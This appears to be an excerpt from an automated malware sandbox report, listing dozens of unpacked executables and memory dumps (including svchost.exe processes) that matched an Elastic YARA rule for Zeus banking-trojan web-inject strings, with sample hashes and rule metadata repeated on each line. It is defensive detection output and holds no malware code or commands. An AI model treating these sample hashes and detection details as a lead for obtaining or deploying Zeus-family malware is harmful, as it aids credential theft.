Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.7081e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.40.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.43.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.48.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.32.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.55.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2809572996.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2784640433.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2575291599.000000000F380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2612530811.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2544138671.000000000D580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775654849.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2587965689.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2793511340.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2763018604.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
